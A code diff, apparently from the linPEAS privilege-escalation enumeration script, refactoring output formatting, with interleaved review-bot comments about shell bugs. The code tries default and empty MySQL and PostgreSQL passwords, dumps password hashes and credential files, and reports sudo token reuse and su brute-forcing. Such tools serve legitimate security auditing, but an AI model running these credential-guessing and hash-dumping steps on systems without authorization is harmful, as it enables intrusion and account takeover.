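Review bot: The new `echo "Sudoers file: $filename is readable"` and `cat "$filename" | grep -Iv "^$" ...` lines sit inside `for filename in '/etc/sudoers.d/*'; do`, and the single quotes prevent the glob from expanding, so `-r "$filename"` tests the literal string and a readable drop-in file is never reported. The header should be `for filename in /etc/sudoers.d/*; do`; with an empty or missing directory the loop then sees the unexpanded pattern, which the existing `-r` test correctly rejects. Separately, `echo '' | sudo -S -l` and `echo "$PASSWORD" | sudo -S -l` each perform an authentication attempt that sudo records in the auth log, which is worth a one-line comment for operators who care about noise; that behaviour predates this commit. The enclosing `UsrI` check block starts before this hunk.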
@@ -1752,37 +1837,37 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then done if [ -f "/tmp/shrndom32r2r" ]; then rm /tmp/shrndom32r2r 2>/dev/null - echo "Sudo token reuse exploit worked! (see link)" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; + echo "Sudo token reuse exploit worked! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; else echo "The escalation didn't work... (try again later?)" fi fi echo "" #-- UI) Doas - printf $Y"[+] "$GREEN"Checking doas.conf\n"$NC - if [ "`cat /etc/doas.conf "$(dirname $(command -v doas) 2>/dev/null)/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/../etc/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/etc/doas.conf" 2>/dev/null`" ]; then cat /etc/doas.conf "$(dirname $(command -v doas))/doas.conf" "$(dirname $(command -v doas))/../etc/doas.conf" "$(dirname $(command -v doas))/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed "s,nopass,${C}[1;31m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," + print_2title "Checking doas.conf" + if [ "`cat /etc/doas.conf "$(dirname $(command -v doas) 2>/dev/null)/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/../etc/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/etc/doas.conf" 2>/dev/null`" ]; then cat /etc/doas.conf "$(dirname $(command -v doas))/doas.conf" "$(dirname $(command -v doas))/../etc/doas.conf" "$(dirname $(command -v doas))/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," else echo_not_found "/etc/doas.conf" fi echo "" #-- UI) Pkexec policy - printf $Y"[+] "$GREEN"Checking Pkexec policy\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2\n"$NC - (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 
2>/dev/null | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m," | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m," | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$Groups,${C}[1;31;103m&${C}[0m,") || echo_not_found "/etc/polkit-1/localauthority.conf.d" + print_2title "Checking Pkexec policy" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" + (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" echo "" #-- UI) Superusers - printf $Y"[+] "$GREEN"Superusers\n"$NC - awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + print_2title "Superusers" + awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," echo "" #-- UI) Users with console - printf $Y"[+] "$GREEN"Users with console\n"$NC + print_2title "Users with console" if [ "$MACPEAS" ]; then dscl . list /Users | while read uname; do ushell=`dscl . -read "/Users/$uname" UserShell | cut -d " " -f2` if [ "`grep \"$ushell\" /etc/shells`" ]; then #Shell user - dscl . 
-read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," echo "" fi done @@ -1790,17 +1875,17 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then no_shells="`cat /etc/passwd 2>/dev/null | grep -Ev "sh$" | cut -d ":" -f 7 | sort | uniq`" unexpected_shells="" printf "%s\n" "$no_shells" | while read f; do - if [ "`$f -c 'whoami' 2>/dev/null | grep \"$USER\"`" ]; then + if [ "`$f -c 'whoami' 2>/dev/null | grep \"$USER\"`" ]; then unexpected_shells="$f\n$unexpected_shells" fi done - cat /etc/passwd 2>/dev/null | grep "sh$" | sort | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + cat /etc/passwd 2>/dev/null | grep "sh$" | sort | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," if [ "$unexpected_shells" ]; then - echo "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${C}[1;31m&${C}[0m,g" + echo "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" echo "Unexpected users with shells:" printf "%s\n" "$unexpected_shells" | while read f; do if [ "$f" ]; then - grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${C}[1;31m&${C}[0m,g" + grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" fi done fi 
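Review bot: In the doas.conf check, `$(dirname $(command -v doas) 2>/dev/null)` expands to `.` when doas is not installed (GNU `dirname ''` prints `.`), so both the test and the `cat` then read `./doas.conf`, `./../etc/doas.conf` and `./etc/doas.conf` relative to the current working directory and can report an unrelated file as the system's doas policy; capturing `doas_bin="$(command -v doas 2>/dev/null)"` first and only adding the `dirname`-derived paths when `$doas_bin` is non-empty avoids that. Separately, the switch to `${SED_RED}`/`${SED_BLUE}`/`${SED_GREEN}` leaves the cyan `${C}[1;96m&${C}[0m` (for `$sh_usrs`) and magenta `${C}[1;95m&${C}[0m` (for `$USER`) escapes inline in the Pkexec policy, Superusers and Users-with-console lines, and the same leftover recurs in the hunks at @@ -1790, @@ -1808 and @@ -1864; either define matching constants next to the existing ones or comment why those two colors stay raw. The enclosing `if [ "\`echo $CHECKS | grep UsrI\`" ]` block starts outside the hunk.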
@@ -1808,38 +1893,38 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then echo "" #-- UI) All users & groups - printf $Y"[+] "$GREEN"All users & groups\n"$NC + print_2title "All users & groups" if [ "$MACPEAS" ]; then - dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" + dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" else - cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" fi echo "" #-- UI) Login now - printf $Y"[+] "$GREEN"Login now\n"$NC - (w || who || users) 2>/dev/null | sed -${E} 
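Review bot: `unexpected_shells` is assigned inside `printf "%s\n" "$no_shells" | while read f; do ... done`, and because the loop runs on the right side of a pipe it executes in a subshell, so the assignment is lost and the following `if [ "$unexpected_shells" ]` block (the "These unexpected binaries are acting like shells" report) can never fire. Collect the matches through command substitution instead: `unexpected_shells="$(printf "%s\n" "$no_shells" | while read f; do if [ "\`$f -c 'whoami' 2>/dev/null | grep \"$USER\"\`" ]; then printf '%s\n' "$f"; fi; done)"`. Note also that this loop executes every binary listed in the shell column of /etc/passwd with `-c 'whoami'`, which is worth a comment such as `# executes each non-sh login "shell" from /etc/passwd; a planted binary there runs with the auditor's privileges`. The enclosing `if [ "\`echo $CHECKS | grep UsrI\`" ]` block starts outside the hunk.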
"s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + print_2title "Login now" + (w || who || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," echo "" #-- UI) Last logons - printf $Y"[+] "$GREEN"Last logons\n"$NC - (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + print_2title "Last logons" + (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," echo "" #-- UI) Login info - printf $Y"[+] "$GREEN"Last time logon each user\n"$NC - lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + print_2title "Last time logon each user" + lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," echo "" #-- UI) Password policy - printf $Y"[+] "$GREEN"Password policy\n"$NC + print_2title "Password policy" grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" echo "" #-- UI) Brute su EXISTS_SUDO="`command -v sudo 2>/dev/null`" if ! [ "$FAST" ] && ! 
[ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then - printf $Y"[+] "$GREEN"Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC + print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC POSSIBE_SU_BRUTE=`check_if_su_brute`; if [ "$POSSIBE_SU_BRUTE" ]; then SHELLUSERS=`cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1` @@ -1851,9 +1936,9 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then printf $GREEN"It's not possible to brute-force su.\n\n"$NC fi else - printf $Y"[+] "$GREEN"Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC + print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC fi - printf $Y"[+] "$GREEN"Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC + print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC echo "" echo "" if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi 
@@ -1864,335 +1949,220 @@ if [ "`echo $CHECKS | grep SofI`" ]; then ########################################### #--------) Software Information (---------# ########################################### - printf $B"═══════════════════════════════════╣ "$GREEN"Software Information"$B" ╠═══════════════════════════════════\n"$NC + print_title "Software Information" #-- SI) Mysql version - printf $Y"[+] "$GREEN"MySQL version\n"$NC + print_2title "MySQL version" mysql --version 2>/dev/null || echo_not_found "mysql" echo "" #-- SI) Mysql connection root/root - printf $Y"[+] "$GREEN"MySQL connection using default root/root ........... "$NC + print_list "MySQL connection using default root/root ........... " mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null` if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi #-- SI) Mysql connection root/toor - printf $Y"[+] "$GREEN"MySQL connection using root/toor ................... "$NC + print_list "MySQL connection using root/toor ................... 
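Review bot: The three `print_2title` calls introduced in the su/sudo section keep the `\n"$NC` tail from the old `printf` lines (`print_2title "Testing 'su' as other users ... top2000pwds\n"$NC`, `print_2title "Do not forget to test 'su' ... (I can't do it...)\n"$NC`, `print_2title "Do not forget to execute 'sudo -l' ... !!\n"$NC`), so the title argument carries a literal `\n` plus whatever `$NC` expands to, unlike every other `print_2title "..."` call in this diff. Whether print_2title emits its own newline and reset is not visible here, but the suffix should be dropped so the calls read e.g. `print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!"`. The enclosing `if [ "\`echo $CHECKS | grep UsrI\`" ]` block starts outside the hunk.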
" mysqlconnect=`mysqladmin -uroot -ptoor version 2>/dev/null` if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi #-- SI) Mysql connection root/NOPASS mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null` - printf $Y"[+] "$GREEN"MySQL connection using root/NOPASS ................. "$NC + print_list "MySQL connection using root/NOPASS ................. " if [ "$mysqlconnectnopass" ]; then - echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi #-- SI) Mysql credentials - printf $Y"[+] "$GREEN"Searching mysql credentials and exec\n"$NC - mysqldirs=$(echo "$FIND_DIR_ETC\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_MNT" | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -v "mysql/mysql") - if [ "$mysqldirs" ]; then - printf "%s\n" "$mysqldirs" | while read d; do + print_2title "Searching mysql credentials and exec" + if [ "$PSTORAGE_MYSQL" ]; then + printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do for f in `find $d -name debian.cnf 2>/dev/null`; do - if [ -r $f ]; then - echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + if [ -r $f ]; then + echo "We can read the mysql debian.cnf. 
You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," cat "$f" fi done for f in `find $d -name user.MYD 2>/dev/null`; do - if [ -r "$f" ]; then - echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" + if [ -r "$f" ]; then + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," + grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" fi done for f in `grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"`; do if [ -r "$f" ]; then u=`cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null` - echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," fi done for f in `find $d -name my.cnf 2>/dev/null`; do - if [ -r "$f" ]; then + if [ -r "$f" ]; then echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed "s,password.*,${C}[1;31m&${C}[0m," + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," fi done mysqlexec=`whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so"` - if [ "$mysqlexec" ]; then + if [ "$mysqlexec" ]; then echo "Found $mysqlexec" - echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," fi done else echo_not_found fi echo "" - #-- SI) PostgreSQL info - printf $Y"[+] 
"$GREEN"PostgreSQL version and pgadmin credentials\n"$NC - postgver=`psql -V 2>/dev/null` - postgdb=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'pgadmin.*\.db$') - postgconfs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$') - if [ "$postgver" ] || [ "$postgdb" ] || [ "$postgconfs" ]; then - if [ "$postgver" ]; then echo "Version: $postgver"; fi - if [ "$postgdb" ]; then echo "PostgreSQL database: $postgdb" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi - printf "%s\n" "$postgconfs" | while read f; do - if [ -r "$f" ]; then - echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${C}[1;31m&${C}[0m," 2>/dev/null - echo "" - fi - done - else echo_not_found - fi - echo "" + print_2title "Analizing PostgreSQL Files (limit 70)" + echo "Version: $(warn_exec psql -V 2>/dev/null)" + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then echo_not_found "pgadmin*.db"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then echo_not_found "pg_hba.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then echo_not_found "postgresql.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,postgresql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then echo_not_found "pgsql.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + #-- SI) PostgreSQL brute if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this - printf $Y"[+] "$GREEN"PostgreSQL connection to template0 using postgres/NOPASS ........ "$NC - if [ "`timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " + if [ "`timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no fi - printf $Y"[+] "$GREEN"PostgreSQL connection to template1 using postgres/NOPASS ........ "$NC - if [ "`timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed "s,.)*,${C}[1;31m&${C}[0m," + print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ 
" + if [ "`timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," else echo_no fi - printf $Y"[+] "$GREEN"PostgreSQL connection to template0 using pgsql/NOPASS ........... "$NC - if [ "`timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " + if [ "`timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no fi - printf $Y"[+] "$GREEN"PostgreSQL connection to template1 using pgsql/NOPASS ........... "$NC - if [ "`timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " + if [ "`timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no fi echo "" fi - #-- SI) Apache info - printf $Y"[+] "$GREEN"Apache server info\n"$NC - apachever=`apache2 -v 2>/dev/null; httpd -v 2>/dev/null` - if [ "$apachever" ]; then - echo "Version: $apachever" - sitesenabled=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep "sites-enabled") - printf "%s\n" "$sitesenabled" | while read d; do for f in "$d/*"; do grep "AuthType\|AuthName\|AuthUserFile\|ServerName\|ServerAlias" $f 2>/dev/null | grep -v "#" | sed "s,Auth|ServerName|ServerAlias,${C}[1;31m&${C}[0m,"; done; done - if [ !"$sitesenabled" ]; then - default00=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep "000-default") - printf "%s\n" "$default00" | while read f; do grep -E 
"AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" "$f" 2>/dev/null | grep -v "#" | sed -${E} "s,Auth|ServerName|ServerAlias,${C}[1;31m&${C}[0m,"; done - fi - echo "PHP exec extensions" + print_2title "Analizing Mongo Files (limit 70)" + echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)" + if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then echo_not_found "mongod*.conf"; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo ""; + + + print_2title "Analizing Apache Files (limit 70)" + echo "Version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" + print_3title 'PHP exec extensions' grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null - else echo_not_found - fi - echo "" + if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"sites-enabled$\"`" ]; then echo_not_found "sites-enabled"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" | sed -${E} "s,sites-enabled$,${SED_RED},"; for ff in $(find "$f" -name "*"); do ls -ld "$ff" | sed -${E} "s,,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" | grep -Ev "^#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo "";done; echo ""; + if ! 
